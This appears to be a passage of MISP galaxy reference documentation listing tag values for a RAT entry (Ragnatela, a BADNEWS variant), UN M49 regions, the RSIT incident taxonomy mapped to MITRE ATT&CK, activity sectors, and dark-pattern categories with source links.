Malwarebytes Lab identified a new variant of the BADNEWS RAT called Ragnatela. It is being distributed via spear phishing emails to targets of interest in Pakistan. Ragnatela, which means spider web in Italian, is also the project name and panel used by Patchwork APT. Ironically, the threat actor infected themselves with their own RAT.

The tag is: misp-galaxy:rat="Ragnatela"

View relationships graph

Ragnatela has relationships with:

similar: misp-galaxy:mitre-malware="BADNEWS - S0128" with estimative-language:likelihood-probability="likely"

Table 6105. Table References
Links
https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/

Regions UN M49

Regions based on UN M49..

Regions UN M49 is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Unknown

001 - World

The tag is: misp-galaxy:region="001 - World"

002 - Africa

The tag is: misp-galaxy:region="002 - Africa"

019 - Americas

The tag is: misp-galaxy:region="019 - Americas"

142 - Asia

The tag is: misp-galaxy:region="142 - Asia"

150 - Europe

The tag is: misp-galaxy:region="150 - Europe"

009 - Oceania

The tag is: misp-galaxy:region="009 - Oceania"

015 - Northern Africa

The tag is: misp-galaxy:region="015 - Northern Africa"

202 - Sub-Saharan Africa

The tag is: misp-galaxy:region="202 - Sub-Saharan Africa"

419 - Latin America and the Caribbean

The tag is: misp-galaxy:region="419 - Latin America and the Caribbean"

021 - Northern America

The tag is: misp-galaxy:region="021 - Northern America"

143 - Central Asia

The tag is: misp-galaxy:region="143 - Central Asia"

030 - Eastern Asia

The tag is: misp-galaxy:region="030 - Eastern Asia"

035 - South-eastern Asia

The tag is: misp-galaxy:region="035 - South-eastern Asia"

034 - Southern Asia

The tag is: misp-galaxy:region="034 - Southern Asia"

145 - Western Asia

The tag is: misp-galaxy:region="145 - Western Asia"

151 - Eastern Europe

The tag is: misp-galaxy:region="151 - Eastern Europe"

154 - Northern Europe

The tag is: misp-galaxy:region="154 - Northern Europe"

039 - Southern Europe

The tag is: misp-galaxy:region="039 - Southern Europe"

155 - Western Europe

The tag is: misp-galaxy:region="155 - Western Europe"

053 - Australia and New Zealand

The tag is: misp-galaxy:region="053 - Australia and New Zealand"

054 - Melanesia

The tag is: misp-galaxy:region="054 - Melanesia"

057 - Micronesia

The tag is: misp-galaxy:region="057 - Micronesia"

061 - Polynesia

The tag is: misp-galaxy:region="061 - Polynesia"

014 - Eastern Africa

The tag is: misp-galaxy:region="014 - Eastern Africa"

017 - Middle Africa

The tag is: misp-galaxy:region="017 - Middle Africa"

018 - Southern Africa

The tag is: misp-galaxy:region="018 - Southern Africa"

011 - Western Africa

The tag is: misp-galaxy:region="011 - Western Africa"

029 - Caribbean

The tag is: misp-galaxy:region="029 - Caribbean"

013 - Central America

The tag is: misp-galaxy:region="013 - Central America"

005 - South America

The tag is: misp-galaxy:region="005 - South America"

830 - Channel Islands

The tag is: misp-galaxy:region="830 - Channel Islands"

rsit

rsit.

rsit is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Koen Van Impe

Abusive Content:Spam

Or 'Unsolicited Bulk Email', this means that the recipient has not granted verifiable permission for the message to be sent and that the message is sent as part of a larger collection of messages, all having a functionally comparable content. This IOC refers to resources, which make up a SPAM infrastructure, be it a harvesters like address verification, URLs in spam e-mails etc.

The tag is: misp-galaxy:rsit="Abusive Content:Spam"

View relationships graph

Abusive Content:Spam has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Abusive Content:Harmful Speech

Discretization or discrimination of somebody, e.g. cyber stalking, racism or threats against one or more individuals.

The tag is: misp-galaxy:rsit="Abusive Content:Harmful Speech"

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content

Child Sexual Exploitation (CSE), Sexual content, glorification of violence, etc.

The tag is: misp-galaxy:rsit="Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content"

View relationships graph

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Malicious Code:Infected System

System infected with malware, e.g. PC, smartphone or server infected with a rootkit. Most often this refers to a connection to a sinkholed C2 server

The tag is: misp-galaxy:rsit="Malicious Code:Infected System"

Malicious Code:C2 Server

Command-and-control server contacted by malware on infected systems.

The tag is: misp-galaxy:rsit="Malicious Code:C2 Server"

View relationships graph

Malicious Code:C2 Server has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="likely"

Malicious Code:Malware Distribution

URI used for malware distribution, e.g. a download URL included in fake invoice malware spam or exploit-kits (on websites).

The tag is: misp-galaxy:rsit="Malicious Code:Malware Distribution"

Malicious Code:Malware Configuration

URI hosting a malware configuration file, e.g. web-injects for a banking trojan.

The tag is: misp-galaxy:rsit="Malicious Code:Malware Configuration"

Information Gathering:Scanning

Attacks that send requests to a system to discover weaknesses. This also includes testing processes to gather information on hosts, services and accounts. Examples: fingerd, DNS querying, ICMP, SMTP (EXPN, RCPT, …), port scanning.

The tag is: misp-galaxy:rsit="Information Gathering:Scanning"

View relationships graph

Information Gathering:Scanning has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="likely"

Information Gathering:Sniffing

Observing and recording of network traffic (wiretapping).

The tag is: misp-galaxy:rsit="Information Gathering:Sniffing"

View relationships graph

Information Gathering:Sniffing has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="likely"

Information Gathering:Social Engineering

Gathering information from a human being in a non-technical way (e.g. lies, tricks, bribes, or threats).

The tag is: misp-galaxy:rsit="Information Gathering:Social Engineering"

Intrusion Attempts:Exploitation of known Vulnerabilities

An attempt to compromise a system or to disrupt any service by exploiting vulnerabilities with a standardised identifier such as CVE name (e.g. buffer overflow, backdoor, cross site scripting, etc.)

The tag is: misp-galaxy:rsit="Intrusion Attempts:Exploitation of known Vulnerabilities"

View relationships graph

Intrusion Attempts:Exploitation of known Vulnerabilities has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="likely"

Intrusion Attempts:Login attempts

Multiple login attempts (Guessing / cracking of passwords, brute force). This IOC refers to a resource, which has been observed to perform brute-force attacks over a given application protocol.

The tag is: misp-galaxy:rsit="Intrusion Attempts:Login attempts"

View relationships graph

Intrusion Attempts:Login attempts has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="likely"

Intrusion Attempts:New attack signature

An attack using an unknown exploit.

The tag is: misp-galaxy:rsit="Intrusion Attempts:New attack signature"

Intrusions:Privileged Account Compromise

Compromise of a system where the attacker gained administrative privileges.

The tag is: misp-galaxy:rsit="Intrusions:Privileged Account Compromise"

View relationships graph

Intrusions:Privileged Account Compromise has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

Intrusions:Unprivileged Account Compromise

Compromise of a system using an unprivileged (user/service) account.

The tag is: misp-galaxy:rsit="Intrusions:Unprivileged Account Compromise"

View relationships graph

Intrusions:Unprivileged Account Compromise has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

Intrusions:Application Compromise

Compromise of an application by exploiting (un-)known software vulnerabilities, e.g. SQL injection.

The tag is: misp-galaxy:rsit="Intrusions:Application Compromise"

View relationships graph

Intrusions:Application Compromise has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="likely"

Intrusions:System Compromise

Compromise of a system, e.g. unauthorised logins or commands. This includes compromising attempts on honeypot systems.

The tag is: misp-galaxy:rsit="Intrusions:System Compromise"

Intrusions:Burglary

Physical intrusion, e.g. into corporate building or data-centre.

The tag is: misp-galaxy:rsit="Intrusions:Burglary"

Availability:Denial of Service

Denial of Service attack, e.g. sending specially crafted requests to a web application which causes the application to crash or slow down.

The tag is: misp-galaxy:rsit="Availability:Denial of Service"

View relationships graph

Availability:Denial of Service has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Availability:Distributed Denial of Service

Distributed Denial of Service attack, e.g. SYN-Flood or UDP-based reflection/amplification attacks.

The tag is: misp-galaxy:rsit="Availability:Distributed Denial of Service"

View relationships graph

Availability:Distributed Denial of Service has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Availability:Misconfiguration

Software misconfiguration resulting in service availability issues, e.g. DNS server with outdated DNSSEC Root Zone KSK.

The tag is: misp-galaxy:rsit="Availability:Misconfiguration"

Availability:Sabotage

Physical sabotage, e.g cutting wires or malicious arson.

The tag is: misp-galaxy:rsit="Availability:Sabotage"

Availability:Outage

Outage caused e.g. by air condition failure or natural disaster.

The tag is: misp-galaxy:rsit="Availability:Outage"

Information Content Security:Unauthorised access to information

Unauthorised access to information, e.g. by abusing stolen login credentials for a system or application, intercepting traffic or gaining access to physical documents.

The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised access to information"

Information Content Security:Unauthorised modification of information

Unauthorised modification of information, e.g. by an attacker abusing stolen login credentials for a system or application or a ransomware encrypting data. Also includes defacements.

The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised modification of information"

View relationships graph

Information Content Security:Unauthorised modification of information has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="likely"

Information Content Security:Data Loss

Loss of data, e.g. caused by harddisk failure or physical theft.

The tag is: misp-galaxy:rsit="Information Content Security:Data Loss"

Information Content Security:Leak of confidential information

Leaked confidential information like credentials or personal data.

The tag is: misp-galaxy:rsit="Information Content Security:Leak of confidential information"

Fraud:Unauthorised use of resources

Using resources for unauthorised purposes including profit-making ventures, e.g. the use of e-mail to participate in illegal profit chain letters or pyramid schemes.

The tag is: misp-galaxy:rsit="Fraud:Unauthorised use of resources"

Fraud:Copyright

Offering or Installing copies of unlicensed commercial software or other copyright protected materials (Warez).

The tag is: misp-galaxy:rsit="Fraud:Copyright"

Fraud:Masquerade

Type of attack in which one entity illegitimately impersonates the identity of another in order to benefit from it.

The tag is: misp-galaxy:rsit="Fraud:Masquerade"

Fraud:Phishing

Masquerading as another entity in order to persuade the user to reveal private credentials. This IOC most often refers to a URL, which is used to phish user credentials.

The tag is: misp-galaxy:rsit="Fraud:Phishing"

View relationships graph

Fraud:Phishing has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Vulnerable:Weak crypto

Publicly accessible services offering weak crypto, e.g. web servers susceptible to POODLE/FREAK attacks.

The tag is: misp-galaxy:rsit="Vulnerable:Weak crypto"

Vulnerable:DDoS amplifier

Publicly accessible services that can be abused for conducting DDoS reflection/amplification attacks, e.g. DNS open-resolvers or NTP servers with monlist enabled.

The tag is: misp-galaxy:rsit="Vulnerable:DDoS amplifier"

View relationships graph

Vulnerable:DDoS amplifier has relationships with:

similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Vulnerable:Potentially unwanted accessible services

Potentially unwanted publicly accessible services, e.g. Telnet, RDP or VNC.

The tag is: misp-galaxy:rsit="Vulnerable:Potentially unwanted accessible services"

Vulnerable:Information disclosure

Publicly accessible services potentially disclosing sensitive information, e.g. SNMP or Redis.

The tag is: misp-galaxy:rsit="Vulnerable:Information disclosure"

Vulnerable:Vulnerable system

A system which is vulnerable to certain attacks. Example: misconfigured client proxy settings (example: WPAD), outdated operating system version, XSS vulnerabilities, etc.

The tag is: misp-galaxy:rsit="Vulnerable:Vulnerable system"

Other:Uncategorised

All incidents which don’t fit in one of the given categories should be put into this class or the incident is not categorised.

The tag is: misp-galaxy:rsit="Other:Uncategorised"

Other:Undetermined

The categorisation of the incident is unknown/undetermined.

The tag is: misp-galaxy:rsit="Other:Undetermined"

Test:Test

Meant for testing.

The tag is: misp-galaxy:rsit="Test:Test"

Sector

Activity sectors.

Sector is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Various

Unknown

The tag is: misp-galaxy:sector="Unknown"

Other

The tag is: misp-galaxy:sector="Other"

Academia - University

The tag is: misp-galaxy:sector="Academia - University"

Activists

The tag is: misp-galaxy:sector="Activists"

Aerospace

The tag is: misp-galaxy:sector="Aerospace"

Agriculture

The tag is: misp-galaxy:sector="Agriculture"

Arts

The tag is: misp-galaxy:sector="Arts"

Bank

The tag is: misp-galaxy:sector="Bank"

Chemical

The tag is: misp-galaxy:sector="Chemical"

Citizens

The tag is: misp-galaxy:sector="Citizens"

Civil Aviation

The tag is: misp-galaxy:sector="Civil Aviation"

Country

The tag is: misp-galaxy:sector="Country"

Culture

The tag is: misp-galaxy:sector="Culture"

Data Broker

The tag is: misp-galaxy:sector="Data Broker"

Defense

The tag is: misp-galaxy:sector="Defense"

Development

The tag is: misp-galaxy:sector="Development"

Diplomacy

The tag is: misp-galaxy:sector="Diplomacy"

Education

The tag is: misp-galaxy:sector="Education"

Electric

The tag is: misp-galaxy:sector="Electric"

Electronic

The tag is: misp-galaxy:sector="Electronic"

Employment

The tag is: misp-galaxy:sector="Employment"

Energy

The tag is: misp-galaxy:sector="Energy"

Entertainment

The tag is: misp-galaxy:sector="Entertainment"

Environment

The tag is: misp-galaxy:sector="Environment"

Finance

The tag is: misp-galaxy:sector="Finance"

Food

The tag is: misp-galaxy:sector="Food"

Game

The tag is: misp-galaxy:sector="Game"

Gas

The tag is: misp-galaxy:sector="Gas"

Government, Administration

The tag is: misp-galaxy:sector="Government, Administration"

Health

The tag is: misp-galaxy:sector="Health"

Higher education

The tag is: misp-galaxy:sector="Higher education"

Hotels

The tag is: misp-galaxy:sector="Hotels"

Infrastructure

The tag is: misp-galaxy:sector="Infrastructure"

Intelligence

The tag is: misp-galaxy:sector="Intelligence"

IT

The tag is: misp-galaxy:sector="IT"

IT - Hacker

The tag is: misp-galaxy:sector="IT - Hacker"

IT - ISP

The tag is: misp-galaxy:sector="IT - ISP"

IT - Security

The tag is: misp-galaxy:sector="IT - Security"

Justice

The tag is: misp-galaxy:sector="Justice"

Manufacturing

The tag is: misp-galaxy:sector="Manufacturing"

Maritime

The tag is: misp-galaxy:sector="Maritime"

Military

The tag is: misp-galaxy:sector="Military"

Multi-sector

The tag is: misp-galaxy:sector="Multi-sector"

News - Media

The tag is: misp-galaxy:sector="News - Media"

NGO

The tag is: misp-galaxy:sector="NGO"

Oil

The tag is: misp-galaxy:sector="Oil"

Payment

The tag is: misp-galaxy:sector="Payment"

Pharmacy

The tag is: misp-galaxy:sector="Pharmacy"

Police - Law enforcement

The tag is: misp-galaxy:sector="Police - Law enforcement"

Research - Innovation

The tag is: misp-galaxy:sector="Research - Innovation"

Satellite navigation

The tag is: misp-galaxy:sector="Satellite navigation"

Security systems

The tag is: misp-galaxy:sector="Security systems"

Social networks

The tag is: misp-galaxy:sector="Social networks"

Space

The tag is: misp-galaxy:sector="Space"

Steel

The tag is: misp-galaxy:sector="Steel"

Telecoms

The tag is: misp-galaxy:sector="Telecoms"

Think Tanks

The tag is: misp-galaxy:sector="Think Tanks"

Trade

The tag is: misp-galaxy:sector="Trade"

Transport

The tag is: misp-galaxy:sector="Transport"

Travel

The tag is: misp-galaxy:sector="Travel"

Turbine

The tag is: misp-galaxy:sector="Turbine"

Tourism

The tag is: misp-galaxy:sector="Tourism"

Life science

The tag is: misp-galaxy:sector="Life science"

Biomedical

The tag is: misp-galaxy:sector="Biomedical"

High tech

The tag is: misp-galaxy:sector="High tech"

Opposition

The tag is: misp-galaxy:sector="Opposition"

Political party

The tag is: misp-galaxy:sector="Political party"

Hospitality

The tag is: misp-galaxy:sector="Hospitality"

Automotive

The tag is: misp-galaxy:sector="Automotive"

Metal

The tag is: misp-galaxy:sector="Metal"

Railway

The tag is: misp-galaxy:sector="Railway"

Water

The tag is: misp-galaxy:sector="Water"

Smart meter

The tag is: misp-galaxy:sector="Smart meter"

Retail

The tag is: misp-galaxy:sector="Retail"

Technology

The tag is: misp-galaxy:sector="Technology"

engineering

The tag is: misp-galaxy:sector="engineering"

Mining

The tag is: misp-galaxy:sector="Mining"

Sport

The tag is: misp-galaxy:sector="Sport"

Restaurant

The tag is: misp-galaxy:sector="Restaurant"

Semi-conductors

The tag is: misp-galaxy:sector="Semi-conductors"

Insurance

The tag is: misp-galaxy:sector="Insurance"

Legal

The tag is: misp-galaxy:sector="Legal"

Shipping

The tag is: misp-galaxy:sector="Shipping"

Logistic

The tag is: misp-galaxy:sector="Logistic"

Construction

The tag is: misp-galaxy:sector="Construction"

Industrial

The tag is: misp-galaxy:sector="Industrial"

Communication equipment

The tag is: misp-galaxy:sector="Communication equipment"

Security Service

The tag is: misp-galaxy:sector="Security Service"

Tax firm

The tag is: misp-galaxy:sector="Tax firm"

Television broadcast

The tag is: misp-galaxy:sector="Television broadcast"

Separatists

The tag is: misp-galaxy:sector="Separatists"

Dissidents

The tag is: misp-galaxy:sector="Dissidents"

Digital services

The tag is: misp-galaxy:sector="Digital services"

Digital infrastructure

The tag is: misp-galaxy:sector="Digital infrastructure"

Security actors

The tag is: misp-galaxy:sector="Security actors"

eCommerce

The tag is: misp-galaxy:sector="eCommerce"

Islamic forums

The tag is: misp-galaxy:sector="Islamic forums"

Journalist

The tag is: misp-galaxy:sector="Journalist"

Streaming service

The tag is: misp-galaxy:sector="Streaming service"

Publishing industry

The tag is: misp-galaxy:sector="Publishing industry"

Islamic organisation

The tag is: misp-galaxy:sector="Islamic organisation"

Casino

The tag is: misp-galaxy:sector="Casino"

Consulting

The tag is: misp-galaxy:sector="Consulting"

Online marketplace

The tag is: misp-galaxy:sector="Online marketplace"

DNS service provider

The tag is: misp-galaxy:sector="DNS service provider"

Veterinary

The tag is: misp-galaxy:sector="Veterinary"

Marketing

The tag is: misp-galaxy:sector="Marketing"

Video Sharing

The tag is: misp-galaxy:sector="Video Sharing"

Advertising

The tag is: misp-galaxy:sector="Advertising"

Investment

The tag is: misp-galaxy:sector="Investment"

Accounting

The tag is: misp-galaxy:sector="Accounting"

Programming

The tag is: misp-galaxy:sector="Programming"

Managed Services Provider

The tag is: misp-galaxy:sector="Managed Services Provider"

Lawyers

The tag is: misp-galaxy:sector="Lawyers"

Civil society

The tag is: misp-galaxy:sector="Civil society"

Petrochemical

The tag is: misp-galaxy:sector="Petrochemical"

Immigration

The tag is: misp-galaxy:sector="Immigration"

Dark Patterns

Dark Patterns are user interface that tricks users into making decisions that benefit the interface’s holder to the expense of the user..

Dark Patterns is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Jean-Louis Huynen

Nagging

Repeated requests to do something the firms prefer

The tag is: misp-galaxy:social-dark-patterns="Nagging"

Table 6106. Table References
Links
https://dl.acm.org/citation.cfm?id=3174108
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Activity Messages

Misleading notice about other consumers' actions

The tag is: misp-galaxy:social-dark-patterns="Activity Messages"

Table 6107. Table References
Links
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Testimonials

Misleading statements from customers

The tag is: misp-galaxy:social-dark-patterns="Testimonials"

Table 6108. Table References
Links
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Roach Motel

Asymmetry between signing up and canceling

The tag is: misp-galaxy:social-dark-patterns="Roach Motel"

Table 6109. Table References
Links
https://dl.acm.org/citation.cfm?id=3174108
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Price Comparison Prevention

Frustrates comparison shopping

The tag is: misp-galaxy:social-dark-patterns="Price Comparison Prevention"

Table 6110. Table References
Links
https://www.darkpatterns.org/
https://dl.acm.org/citation.cfm?id=3174108
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Intermediate Currency

Purchases in virtual currency to obscure cost

The tag is: misp-galaxy:social-dark-patterns="Intermediate Currency"

Table 6111. Table References
Links
https://www.darkpatterns.org/
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Sneak into Basket

Item consumer did not add is in cart

The tag is: misp-galaxy:social-dark-patterns="Sneak into Basket"

Table 6112. Table References
Links
https://www.darkpatterns.org/
https://dl.acm.org/citation.cfm?id=3174108
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Hidden Costs

Costs obscured / disclosed late in transaction

The tag is: misp-galaxy:social-dark-patterns="Hidden Costs"

Table 6113. Table References
Links
https://www.darkpatterns.org/
https://dl.acm.org/citation.cfm?id=3174108
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Hidden subscription / forced continuity

Unanticipated / undesired automatic renewal

The tag is: misp-galaxy:social-dark-patterns="Hidden subscription / forced continuity"

Table 6114. Table References
Links
https://www.darkpatterns.org/
https://dl.acm.org/citation.cfm?id=3174108
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Bait & Switch

Customer sold something other than what’s originally advertised

The tag is: misp-galaxy:social-dark-patterns="Bait & Switch"

Table 6115. Table References
Links
https://dl.acm.org/citation.cfm?id=3174108
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Hidden information / aesthetic manipulation / false hierarchy

Important information visually obscured

The tag is: misp-galaxy:social-dark-patterns="Hidden information / aesthetic manipulation / false hierarchy"

Table 6116. Table References
Links
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Preselection

Firm-friendly default is preselected

The tag is: misp-galaxy:social-dark-patterns="Preselection"

Table 6117. Table References
Links
https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf[https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf]
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Toying with emotion

Emotionally manipulative framing

The tag is: misp-galaxy:social-dark-patterns="Toying with emotion"

Table 6118. Table References
Links
https://dl.acm.org/citation.cfm?id=3174108
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Trick questions

Intentional or obvious ambiguity

The tag is: misp-galaxy:social-dark-patterns="Trick questions"

Table 6119. Table References
Links
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://dl.acm.org/citation.cfm?id=3174108
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Disguised Ad

Consumer induced to click on something that isn’t apparent ad

The tag is: misp-galaxy:social-dark-patterns="Disguised Ad"

Table 6120. Table References
Links
https://dl.acm.org/citation.cfm?id=3174108
https://www.darkpatterns.org/types-of-dark-pattern
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Confirmshaming

Choice framed in way that seems dishonest / stupid

The tag is: misp-galaxy:social-dark-patterns="Confirmshaming"

Table 6121. Table References
Links
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://www.darkpatterns.org/types-of-dark-pattern
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Forced Registration

Consumer tricked into thinking registration necessary

The tag is: misp-galaxy:social-dark-patterns="Forced Registration"

Table 6122. Table References
Links
https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf[https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf]
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Low stock / high-demand message

Consumer falsely informed of limited quantities

The tag is: misp-galaxy:social-dark-patterns="Low stock / high-demand message"

Table 6123. Table References
Links
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Countdown timer / Limited time message

Opportunity ends soon with blatant false visual cue

The tag is: misp-galaxy:social-dark-patterns="Countdown timer / Limited time message"

Table 6124. Table References
Links
https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

SoD Matrix

SOD Matrix.

SoD Matrix is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Koen Van Impe